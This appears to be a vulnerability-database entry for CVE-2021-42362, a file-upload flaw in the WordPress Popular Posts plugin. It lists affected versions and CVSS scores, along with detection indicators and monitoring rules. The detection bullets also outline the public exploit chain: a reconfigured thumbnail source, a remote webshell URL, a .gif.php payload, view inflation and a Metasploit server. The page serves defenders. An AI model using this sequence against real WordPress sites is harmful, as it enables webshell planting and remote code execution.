cbcvebase.
CVE-2021-42362
published 2021-11-17

CVE-2021-42362: The WordPress Popular Posts WordPress plugin is vulnerable to arbitrary file uploads due to insufficient input file type validation found in the…

PriorityP278high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
79.82%
99.6th percentile
The WordPress Popular Posts WordPress plugin is vulnerable to arbitrary file uploads due to insufficient input file type validation found in the ~/src/Image.php file which makes it possible for attackers with contributor level access and above to upload malicious files that can be used to obtain remote code execution, in versions up to and including 5.3.2.

Affected

2 ranges
VendorProductVersion rangeFixed in
wordpress_popular_postswordpress_popular_posts0.0 – 5.3.2
wordpress_popular_posts_projectwordpress_popular_posts<= 5.3.2

Detection & IOCsextracted from sources · hover to see the quote

path~/src/Image.php
pathwp-content/uploads/wordpress-popular-posts/
urlwp-admin/options-general.php?page=wordpress-popular-posts&tab=debug
urlwp-admin/options-general.php?page=wordpress-popular-posts&tab=tools
urlindex.php/wp-json/wordpress-popular-posts/v1/popular-posts
urlwp-admin/admin-ajax.php
filename*.gif.php
commandaction=wpp_clear_thumbnail
commandaction=add-meta
othermetakeyselect=wpp_thumbnail
otherthumb_source=custom_field
bytes
GIF header prepended to PHP payload
  • Monitor POST requests to wp-admin/admin-ajax.php with action=add-meta and metakeyselect=wpp_thumbnail containing an external URL as the metavalue — this is the step that registers the remote shell URL as the post thumbnail custom field.
  • Alert on files with double extensions (e.g. .gif.php) appearing under wp-content/uploads/wordpress-popular-posts/ — the exploit drops the webshell there after the plugin fetches and saves the remote payload.
  • Detect outbound server-side HTTP requests originating from the WordPress process to external hosts for files with .gif.php or similar double-extension names — the plugin fetches the attacker-hosted payload automatically.
  • Flag POST requests to wp-admin/options-general.php?page=wordpress-popular-posts&tab=tools with body parameter thumb_source=custom_field — this reconfigures the plugin to accept arbitrary URLs for thumbnails, a prerequisite step in the exploit chain.
  • Detect HTTP requests with User-Agent 'Monies Browser 1.0' targeting WordPress login and admin endpoints — this is the hardcoded UA string used by the public exploit script.
  • Monitor POST requests to wp-admin/admin-ajax.php with action=wpp_clear_thumbnail — this cache-clearing step is performed by the exploit immediately before triggering the malicious thumbnail download.
  • Rapid repeated GET requests to the same post URL (10 times in quick succession) followed by POSTs to /wp-json/wordpress-popular-posts/v1/popular-posts with wpp_id matching that post — this is the view-inflation step used to push the malicious post into the top-5 widget.
  • The exploit requires the Metasploit payload server to be reachable on port 80, 443, or 8080 with a FQDN resolving to a non-RFC1918 address; monitor for WordPress servers making outbound connections to non-private IPs on these ports fetching image-like filenames.
  • ·The attacker must hold at least Contributor-level WordPress credentials — unauthenticated exploitation is not possible.
  • ·There is a ~90-second wait built into the exploit chain to allow the server-side Popular Posts cache (60 sec refresh) to expire before the widget loads and triggers the payload download.
  • ·The attacker-hosted payload server must respond to a HEAD request before the GET — defenders can use this two-phase fetch pattern as a detection signal.
  • ·Affects WordPress Popular Posts plugin versions up to and including 5.3.2 only.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.